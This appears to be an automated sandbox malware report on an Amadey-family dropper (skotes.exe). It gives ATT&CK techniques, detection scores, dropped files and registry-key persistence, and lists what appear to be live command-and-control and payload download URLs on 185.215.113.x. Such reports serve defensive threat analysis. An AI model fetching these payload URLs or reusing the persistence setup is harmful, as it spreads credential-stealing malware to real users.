                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                  Software Packing
                  Cached Domain Credentials1
                  Account Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync1
                  System Owner/User Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                  File and Directory Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow25
                  System Information Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1518031 Sample: yjzllYsjlU.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 9 other signatures 2->66 7 yjzllYsjlU.exe 5 2->7         started        11 skotes.exe 2->11         started        process3 dnsIp4 46 C:\Users\user\AppData\Local\...\skotes.exe, PE32 7->46 dropped 48 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 7->48 dropped 68 Detected unpacking (changes PE section rights) 7->68 70 Detected unpacking (overwrites its own PE header) 7->70 72 Contains functionality to inject code into remote processes 7->72 14 skotes.exe 7->14         started        17 WerFault.exe 16 7->17         started        20 WerFault.exe 16 7->20         started        30 8 other processes 7->30 56 185.215.113.43, 49748, 49749, 49750 WHOLESALECONNECTIONSNL Portugal 11->56 58 185.215.113.103, 64681, 64684, 64695 WHOLESALECONNECTIONSNL Portugal 11->58 50 C:\Users\user\AppData\...\532d9160c6.exe, PE32 11->50 dropped 52 C:\Users\user\AppData\Local\...\random[1].exe, PE32 11->52 dropped 54 C:\Users\user\1000026002\0f2a0c16ee.exe, PE32 11->54 dropped 22 WerFault.exe 11->22         started        24 WerFault.exe 11->24         started        26 WerFault.exe 11->26         started        28 WerFault.exe 11->28         started        file5 signatures6 process7 file8 74 Multi AV Scanner detection for dropped file 14->74 76 Detected unpacking (changes PE section rights) 14->76 78 Detected unpacking (overwrites its own PE header) 14->78 32 WerFault.exe 14->32         started        34 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->34 dropped 36 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->36 dropped 38 C:\ProgramData\Microsoft\...\Report.wer, Unicode 30->38 dropped 40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 30->40 dropped 42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 30->42 dropped 44 5 other malicious files 30->44 dropped signatures9 process10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  yjzllYsjlU.exe39%ReversingLabs
                  yjzllYsjlU.exe100%AviraHEUR/AGEN.1311799
                  yjzllYsjlU.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\1000026002\0f2a0c16ee.exe37%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe37%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\1000023001\532d9160c6.exe37%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe39%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://upx.sf.net0%URL Reputationsafe
                  http://185.215.113.43/Zu7JuNko/index.php60%Avira URL Cloudsafe
                  http://185.215.113.43/Zu7JuNko/index.phpx0%Avira URL Cloudsafe
                  http://185.215.113.43/Zu7JuNko/index.php100%Avira URL Cloudphishing
                  http://185.215.113.103/steam/random.exe;100%Avira URL Cloudmalware
                  http://185.215.113.43/Zu7JuNko/index.phpxe0%Avira URL Cloudsafe
                  http://185.215.113.43/Zu7JuNko/index.phpb0%Avira URL Cloudsafe
                  http://185.215.113.43/Zu7JuNko/index.phpxe9/:x0%Avira URL Cloudsafe
                  http://185.215.113.43/fac00b58981f4a4e1a0ce7e9f0e5ebf5de04349025080d9#0%Avira URL Cloudsafe
                  http://185.215.113.103/mine/random.exe100%Avira URL Cloudmalware
                  http://185.215.113.43/0%Avira URL Cloudsafe
                  http://185.215.113.43/Zu7JuNko/index.phpy1mb3JtLXVybGVuY29kZWQ=100%Avira URL Cloudphishing
                  http://185.215.113.103/steam/random.exe100%Avira URL Cloudmalware
                  http://185.215.113.43/Zu7JuNko/index.phpn0%Avira URL Cloudsafe
                  http://185.215.113.43/Zu7JuNko/index.phpncoded0%Avira URL Cloudsafe
                  http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf00%Avira URL Cloudsafe
                  http://185.215.113.43/Zu7JuNko/index.phpnu0%Avira URL Cloudsafe
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.43/Zu7JuNko/index.phptrue
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.103/mine/random.exefalse
                  • Avira URL Cloud: malware
                  unknown
                  http://185.215.113.103/steam/random.exefalse
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.43/Zu7JuNko/index.php6skotes.exe, 0000001C.00000002.4669668588.00000000008C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.215.113.103/steam/random.exe;skotes.exe, 0000001C.00000002.4669012464.0000000000743000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://185.215.113.43/Zu7JuNko/index.phpxeskotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.215.113.43/fac00b58981f4a4e1a0ce7e9f0e5ebf5de04349025080d9#skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.215.113.43/Zu7JuNko/index.phpxskotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.215.113.43/Zu7JuNko/index.phpxe9/:xskotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.215.113.43/Zu7JuNko/index.phpbskotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.215.113.43/skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://upx.sf.netAmcache.hve.4.drfalse
                  • URL Reputation: safe
                  unknown
                  http://185.215.113.43/Zu7JuNko/index.phpy1mb3JtLXVybGVuY29kZWQ=skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.43/Zu7JuNko/index.phpncodedskotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.215.113.43/Zu7JuNko/index.phpnskotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.215.113.43/Zu7JuNko/index.phpnuskotes.exe, 0000001C.00000002.4669012464.000000000075E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf0skotes.exe, 0000001C.00000002.4669012464.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.43
                  unknownPortugal
                  206894WHOLESALECONNECTIONSNLtrue
                  185.215.113.103
                  unknownPortugal
                  206894WHOLESALECONNECTIONSNLfalse
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1518031
                  Start date and time:2024-09-25 10:31:33 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 6s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:41
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:yjzllYsjlU.exe
                  renamed because original name is a hash value
                  Original Sample Name:05b4b94fe502b06454e6fe20b6965c76.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@19/67@0/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 70
                  • Number of non-executed functions: 295
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.189.173.21, 104.208.16.94, 20.189.173.20
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: yjzllYsjlU.exe
                  TimeTypeDescription
                  04:32:45API Interceptor2x Sleep call for process: WerFault.exe modified
                  04:33:00API Interceptor7926952x Sleep call for process: skotes.exe modified
                  10:32:33Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  10:33:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0f2a0c16ee.exe C:\Users\user\1000026002\0f2a0c16ee.exe
                  10:33:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0f2a0c16ee.exe C:\Users\user\1000026002\0f2a0c16ee.exe
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.43p3aYwXKO5T.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.43/Zu7JuNko/index.php
                  file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                  • 185.215.113.43/Zu7JuNko/index.php
                  file.exeGet hashmaliciousAmadey, StealcBrowse
                  • 185.215.113.43/Zu7JuNko/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.43/Zu7JuNko/index.php
                  185.215.113.103file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.103/steam/random.exe
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.103/steam/random.exe
                  file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                  • 185.215.113.103/well/random.exe
                  file.exeGet hashmaliciousAmadey, StealcBrowse
                  • 185.215.113.103/steam/random.exe
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.103/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.103/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.103/
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.103/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.103/e2b1563c6670f193.php
                  nate.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.103/e2b1563c6670f193.php
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLIWXaKkm4pm.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  p3aYwXKO5T.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.43
                  A1E1u0Rnel.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.43
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.103
                  file.exeGet hashmaliciousAmadey, Go Injector, XWormBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.103
                  isiihLLJJr.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                  • 185.215.113.17
                  WHOLESALECONNECTIONSNLIWXaKkm4pm.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  p3aYwXKO5T.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.43
                  A1E1u0Rnel.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.43
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.103
                  file.exeGet hashmaliciousAmadey, Go Injector, XWormBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.103
                  isiihLLJJr.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                  • 185.215.113.17
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8412880672827984
                  Encrypted:false
                  SSDEEP:96:US7UpsohqwoA7Rn6tQXIDcQnc6rCcEhcw3rb+HbHgnoW6HeysrOyjyoYhEVsPiDp:R7UpE4056rQjpazuiF3Z24IO8nI
                  MD5:280AD54F6B0AFCC25A6E096B71AD8A58
                  SHA1:4B6D578E7146E0D1B9568D395160E176EA63A453
                  SHA-256:0CFB4A09850E35D97DCC333A6A43A12C60143A7347F58AF74798BD15F15FB841
                  SHA-512:153663EC63354E0EB051D1D7400020E50152166E480B5D267D8C39FEA9750DF4F0B64F2F195C2B6DD66CF743F8486D3342A2F54B67AFF32E75CEA4DA8747A755
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.8.4.2.4.6.7.2.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.1.a.7.e.6.c.-.4.1.4.e.-.4.f.0.b.-.8.0.e.f.-.5.d.b.c.e.2.f.a.6.6.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.6.1.5.9.4.5.-.6.a.2.9.-.4.d.2.5.-.9.0.6.5.-.e.9.c.d.7.e.1.7.3.3.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.k.o.t.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.d.0.-.0.0.0.1.-.0.0.1.5.-.3.3.c.7.-.8.f.8.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.0.9.4.f.c.a.3.8.0.6.f.4.3.a.4.e.8.9.f.f.7.1.6.0.8.9.0.f.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.s.k.o.t.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.s.k.o.t.e.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.7841966575895198
                  Encrypted:false
                  SSDEEP:96:S0tIAUMsohqwoA7Rn6tQXIDcQnc6rCcEhcw3rb+HbHgnoW6HeysrOyjyoYhEVsPm:RIAUME4056rQjp6zuiF3Z24IO8nI
                  MD5:EB23A1D7DFD5CFC79E86A563F58228AD
                  SHA1:87BEF2D5CA5B36B50B8EDC4C7DF61CE78C1C3A52
                  SHA-256:D352D0ECD49CC96E0792AEEE3C3D02ADEB9AC05815CD29631561351DD6DB22E2
                  SHA-512:A7D358CBEE02EEE943F426D79BA4437A76240B368F99C50AE834FC8ADD15B17B31C9B44D9A1190B9EAAC8FFDD482175DC8087676E5416C600BB93231EF0CAA00
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.8.0.6.6.6.1.5.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.7.4.8.9.5.2.-.2.2.9.3.-.4.5.7.2.-.9.2.5.d.-.4.1.3.6.e.5.9.0.b.c.4.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.e.7.3.6.8.c.-.7.1.6.d.-.4.d.d.d.-.8.b.f.0.-.0.8.3.4.3.7.5.6.1.c.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.k.o.t.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.d.0.-.0.0.0.1.-.0.0.1.5.-.3.3.c.7.-.8.f.8.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.0.9.4.f.c.a.3.8.0.6.f.4.3.a.4.e.8.9.f.f.7.1.6.0.8.9.0.f.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.s.k.o.t.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.s.k.o.t.e.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8412780755582671
                  Encrypted:false
                  SSDEEP:96:YVzIHUosohqwoA7Rn6tQXIDcQnc6rCcEhcw3rb+HbHgnoW6HeysrOyjyoYhEVsPG:CqUoE4056rQjpazuiF3Z24IO8nI
                  MD5:63715809A5324BF75E0C3EC2271727E8
                  SHA1:0E70D0020CC03C2C31E167A9DE06F3F2FF4ACDBC
                  SHA-256:3B9C4DDFDA0B9BA0CF8A089D18B006C41A5375F6C596767C1530B1FDB5DF4023
                  SHA-512:3626E0B5B00F0E1CE644CE252B020E47E6704AA0D76D8AF48AEACEE534380032079A048F158783BE972F51F90DB38D2BEB5790CB052B46BBF17E2567DB1194F0
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.8.2.8.4.7.1.3.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.e.1.1.0.1.6.-.8.4.c.2.-.4.d.2.4.-.a.f.b.7.-.1.9.9.3.2.1.4.8.b.3.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.1.0.3.b.8.0.-.5.4.0.4.-.4.b.7.9.-.a.f.d.f.-.1.8.0.c.3.9.7.a.6.f.2.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.k.o.t.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.d.0.-.0.0.0.1.-.0.0.1.5.-.3.3.c.7.-.8.f.8.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.0.9.4.f.c.a.3.8.0.6.f.4.3.a.4.e.8.9.f.f.7.1.6.0.8.9.0.f.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.s.k.o.t.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.s.k.o.t.e.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.840993729358504
                  Encrypted:false
                  SSDEEP:96:p0WU5sohqwoA7Rn6tQXIDcQnc6rCcEhcw3rb+HbHgnoW6HeysrOyjyoYhEVsPiDp:qWU5E4056rQjpazuiF3Z24IO8nI
                  MD5:D7D03B25AA1F86FD1E4F804DE2B93E33
                  SHA1:7EA5CAF118F1ACB21F9F83D078A0E2671AF1EF48
                  SHA-256:D622E79D98A653FDD3744CD96BAD6132CA26060B720FFED78A86E910C70B5CFA
                  SHA-512:17CF2F757F3ACACE952A9EDE60E0BC86EA0967415D3F436EDD263DA0EB6F058CF015B7C651119B90E1B6021867B977366632B75EFC3E86E9EA1DEE81E4AE92E9
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.8.3.5.4.0.2.8.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.1.d.a.e.5.7.-.b.c.b.b.-.4.5.b.1.-.a.a.2.7.-.1.8.a.1.e.1.f.2.2.3.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.9.0.0.6.d.c.-.e.8.2.5.-.4.a.1.7.-.8.c.f.0.-.3.e.3.f.5.2.6.3.9.8.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.k.o.t.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.d.0.-.0.0.0.1.-.0.0.1.5.-.3.3.c.7.-.8.f.8.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.0.9.4.f.c.a.3.8.0.6.f.4.3.a.4.e.8.9.f.f.7.1.6.0.8.9.0.f.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.s.k.o.t.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.s.k.o.t.e.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.7819041510867769
                  Encrypted:false
                  SSDEEP:96:v5hpllnU7isohqwC7qlfeQXIDcQ9c6ZNcExcw3b+HbHg/8BRTf3ZFEOyKZoxm9nl:JllnU+EIr0TXL0jp+zuiF3Z24IO8CI
                  MD5:4456662DD53BDF2641D0D6EF012B95E7
                  SHA1:C5856DD8645DF92B4221BD4E5FB6FCF1B369E743
                  SHA-256:282CB2B2389A347F7A77D63E714F28935F530C56645A8524D04FFB5EE9F10F29
                  SHA-512:82D4CECAD872E90F426F81B4C479E799194B814F4412E270D93A0BF04523798AF58F6A80D368C2F6D35A2D37E4975ED76FC7811F2480B93FDF702D76C1CE22B4
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.6.3.8.3.0.4.2.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.2.6.7.6.4.2.6.7.9.2.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.c.d.c.8.c.6.-.d.f.7.e.-.4.6.a.7.-.9.c.a.7.-.3.2.5.d.7.4.3.1.e.1.7.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.0.0.f.4.a.e.-.b.d.4.c.-.4.6.8.e.-.8.6.7.2.-.c.8.0.d.7.8.b.3.3.5.1.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.k.o.t.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.7.8.-.0.0.0.1.-.0.0.1.5.-.a.d.5.8.-.f.7.7.c.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.0.9.4.f.c.a.3.8.0.6.f.4.3.a.4.e.8.9.f.f.7.1.6.0.8.9.0.f.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.s.k.o.t.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.
                  Process:C:\Windows\SysWOW64\WerFault.exe
